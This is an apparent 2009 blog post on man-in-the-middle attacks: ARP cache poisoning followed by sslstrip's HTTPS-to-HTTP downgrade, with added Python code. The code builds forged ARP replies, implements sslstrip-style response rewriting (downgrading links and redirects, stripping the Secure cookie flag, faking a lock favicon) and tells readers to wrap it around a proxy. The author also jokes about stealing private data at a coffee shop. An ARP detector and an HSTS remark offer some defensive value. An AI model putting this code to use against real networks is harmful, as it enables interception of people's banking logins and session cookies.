Friday, April 17, 2009

Man in the Middle

Remember the good old days when we would fire up Cain or dsniff and do a man-in-the-middle attack? What was the big problem with this technique? If you said the invalid certificate warning, you would be right. For those of you not familiar with this, here is the quick and dirty.

ARP, being a trusting soul, will accept an update from anyone by default: a host that receives an ARP reply saying "the gateway's IP is at this MAC" just overwrites its cache entry, whether or not it ever asked. With that in mind we have our computer tell every other computer on the network that the gateway's IP address lives at our MAC. We do this with an unsolicited ARP reply, and we keep resending it every few seconds so their caches never time out and re-learn the real answer. Now all of their outbound traffic comes through us. Since we know the real MAC address of the real gateway, we turn on IP forwarding and send those packets on as normal (and if we want to see the replies too, we poison the gateway the same way, claiming the victims' IPs). Pretty cool. The user is none the wiser at this point.
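Here is the poisoning packet and the trusting cache in working code, as an added example (mine, not from the post or from Cain, dsniff or any other tool it mentions). It builds the unsolicited ARP reply an attacker sends, feeds it to a model of a host that believes any reply, and then runs the check a defender would want: an arpwatch-style comparison of every claimed IP-to-MAC binding against known values. All addresses are made up, nothing is put on the wire, and only the standard library is used.

```python
import struct
from typing import Dict, List, NamedTuple, Optional, Tuple

# Constructed addresses for this example; none of them are real hosts.
GATEWAY_IP = "192.168.1.1"
GATEWAY_MAC = "00:11:22:33:44:55"
VICTIM_IP = "192.168.1.10"
VICTIM_MAC = "00:aa:bb:cc:dd:ee"
ATTACKER_MAC = "de:ad:be:ef:00:01"

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


class ArpPacket(NamedTuple):
    opcode: int
    sender_mac: str
    sender_ip: str
    target_mac: str
    target_ip: str


def mac_bytes(mac: str) -> bytes:
    return bytes(int(part, 16) for part in mac.split(":"))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet frame carrying an ARP reply that says 'sender_ip is-at sender_mac'.

    Nobody has to have asked: this unsolicited reply is what arpspoof and Cain
    send, and a default host simply overwrites its cache entry with it.
    """
    ethernet = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, then the opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return ethernet + arp


def parse_arp(frame: bytes) -> Optional[ArpPacket]:
    """Decode an Ethernet/ARP frame; None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    fmt_mac = lambda raw: ":".join(f"{b:02x}" for b in raw)
    fmt_ip = lambda raw: ".".join(str(b) for b in raw)
    return ArpPacket(opcode, fmt_mac(frame[22:28]), fmt_ip(frame[28:32]),
                     fmt_mac(frame[32:38]), fmt_ip(frame[38:42]))


class TrustingArpCache:
    """The default host behaviour the post describes: any reply overwrites the entry."""

    def __init__(self) -> None:
        self.table: Dict[str, str] = {}

    def process(self, frame: bytes) -> None:
        arp = parse_arp(frame)
        if arp is not None and arp.opcode == ARP_REPLY:
            self.table[arp.sender_ip] = arp.sender_mac

    def lookup(self, ip: str) -> Optional[str]:
        return self.table.get(ip)


def detect_poisoning(frames: List[bytes], known: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """arpwatch-style check: flag replies that claim a known IP with a different MAC.

    Returns (ip, expected_mac, claimed_mac) for each offending frame.
    """
    alerts = []
    for frame in frames:
        arp = parse_arp(frame)
        if arp is None or arp.opcode != ARP_REPLY:
            continue
        if arp.sender_ip in known and known[arp.sender_ip] != arp.sender_mac:
            alerts.append((arp.sender_ip, known[arp.sender_ip], arp.sender_mac))
    return alerts


def demo() -> Tuple[Optional[str], Optional[str], List[Tuple[str, str, str]]]:
    """The victim learns the real gateway, then swallows one poisoned reply."""
    legit = build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    poison = build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    # To see the replies too, send the mirror image to the gateway:
    # build_arp_reply(ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP)
    cache = TrustingArpCache()
    cache.process(legit)
    before = cache.lookup(GATEWAY_IP)
    cache.process(poison)
    after = cache.lookup(GATEWAY_IP)
    alerts = detect_poisoning([legit, poison], {GATEWAY_IP: GATEWAY_MAC})
    return before, after, alerts
```

Putting these frames on the wire needs a raw socket and root (or a tool such as scapy); the point here is the 42-byte packet format and the fact that the victim's cache flips to the attacker's MAC with no question asked. The detect_poisoning check is what arpwatch, or a switch with dynamic ARP inspection, does for you on a real network.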

Now, Joe User decides to head on over to his bank site, which uses HTTPS. When we intercept that connection we terminate the TLS session ourselves and establish a new one from us to the bank. For that brief moment between Joe's packets arriving at us and our forwarding them on, it is all unencrypted. Very cool. Problem! The certificate we hand Joe for his HTTPS session is one we generated and signed ourselves, because we do not have the bank's private key....yet :)) We can put the bank's name in that certificate, but we cannot get a CA that Joe's browser trusts to sign it, so the browser sees a certificate whose signature chains to nobody it knows and throws a warning saying DON'T GO ON OR YOU WILL BE pWNED! OK, it really doesn't say that, but you have all seen the warning before.

Most people will click right through that, not caring one bit. Those of us who are a little more security conscious, though, stop and investigate. Our plan is now foiled. Game over :(.

Enter sslstrip. This nifty tool makes our game go on. What's interesting about sslstrip is that no certificate error is ever shown, because Joe's browser never makes an HTTPS connection at all. sslstrip sits in the middle of Joe's plain-HTTP traffic, and whenever the bank's server answers with a redirect to https:// or a page containing https:// links, it rewrites them to http:// before they reach Joe, while it talks to the bank over real HTTPS on his behalf. Joe's browser is happily on a plain http page, and there is no certificate for it to complain about. So no more warnings, we can just capture away. The catch is that Joe's first request has to be plain HTTP (he typed the bank's name and let the site redirect him, or he followed a link) so that there is a redirect for us to strip. If you want to be a little more sly, sslstrip can also answer the favicon.ico request for the stripped site with a picture of a little lock. Looks secure :) muhahah! Very cool tool. MITM is possible again. So I will leave you with a video from pauldotcom showing how this cool tool works. I'm off to $tarbucks to pwn some private information, I mean surf some websites :)
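The rewriting that makes the trick work, as an added example (mine, not sslstrip's own code; bank.example, the sample response and the placeholder icon bytes are all constructed). It shows the three things the proxy has to do: downgrade https:// in the Location header and in the page body, remember which URLs it downgraded so it can fetch them over real HTTPS when the victim later asks for them over plain http, and optionally hand back a lock favicon for the stripped site. Dropping the Secure flag from Set-Cookie is included as the obvious companion step (a browser will not send a Secure cookie over http); I am not quoting sslstrip's source for that.

```python
import re
from typing import Dict, Optional, Set, Tuple

# Absolute https:// URLs in headers or HTML; bytes because the body is raw wire data.
HTTPS_URL = re.compile(rb"https://([^\s\"'<>]+)")

# Stand-in for a lock-shaped favicon (constructed bytes; sslstrip ships a real icon).
LOCK_FAVICON = b"\x00\x00\x01\x00<constructed lock icon>"

# Constructed response from a hypothetical bank, as the proxy would receive it.
SAMPLE_BODY = (b'<a href="https://bank.example/login">Log in</a> '
               b'<form action="https://bank.example/auth">')
SAMPLE_HEADERS = {
    "Content-Type": "text/html",
    "Content-Length": str(len(SAMPLE_BODY)),
    "Location": "https://bank.example/login",
    "Set-Cookie": "session=abc123; Secure; HttpOnly",
}


class StripState:
    """What the proxy remembers between requests: every 'host/path' it has shown
    the victim as http:// although the real server served it as https://."""

    def __init__(self, swap_favicon: bool = False) -> None:
        self.stripped: Set[str] = set()
        self.swap_favicon = swap_favicon

    def stripped_hosts(self) -> Set[str]:
        return {entry.split("/", 1)[0] for entry in self.stripped}


def rewrite_response(state: StripState, headers: Dict[str, str], body: bytes) -> Tuple[Dict[str, str], bytes]:
    """Downgrade every https:// reference in a server response to http://."""
    new_headers: Dict[str, str] = {}
    for name, value in headers.items():
        if name.lower() == "location" and value.lower().startswith("https://"):
            target = value[len("https://"):]
            state.stripped.add(target)
            value = "http://" + target
        elif name.lower() == "set-cookie":
            # A Secure cookie is never sent over http, so the downgraded session
            # would lose its login; drop the flag (companion step, not sslstrip's code).
            value = re.sub(r";\s*secure", "", value, flags=re.IGNORECASE)
        new_headers[name] = value

    def downgrade(match) -> bytes:
        state.stripped.add(match.group(1).decode("ascii", "replace"))
        return b"http://" + match.group(1)

    new_body = HTTPS_URL.sub(downgrade, body)
    # The body shrank by a byte per rewritten URL; fix the length or the browser hangs.
    for name in new_headers:
        if name.lower() == "content-length":
            new_headers[name] = str(len(new_body))
    return new_headers, new_body


def upstream_scheme(state: StripState, host: str, path: str) -> str:
    """The victim asks over plain http; pick what the proxy uses toward the real server."""
    return "https" if host + path in state.stripped else "http"


def favicon_override(state: StripState, host: str, path: str) -> Optional[bytes]:
    """sslstrip's -f trick: answer /favicon.ico for a stripped host with a lock icon."""
    if state.swap_favicon and path == "/favicon.ico" and host in state.stripped_hosts():
        return LOCK_FAVICON
    return None


def demo() -> Tuple[Dict[str, str], bytes, str, Optional[bytes]]:
    """One server response goes through the proxy, then the victim follows the link."""
    state = StripState(swap_favicon=True)
    headers, body = rewrite_response(state, SAMPLE_HEADERS, SAMPLE_BODY)
    scheme = upstream_scheme(state, "bank.example", "/login")
    icon = favicon_override(state, "bank.example", "/favicon.ico")
    return headers, body, scheme, icon
```

Wrap rewrite_response around whatever HTTP proxy you like and call upstream_scheme on each client request. Note the assumption baked into this: the victim's first request has to be plain http. A site that never answers on port 80, or a browser that already knows to use https for that host (what the later Strict-Transport-Security header gives you), never hands the proxy a redirect to strip.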

John Strand's Channel showing SSLStrip and more!
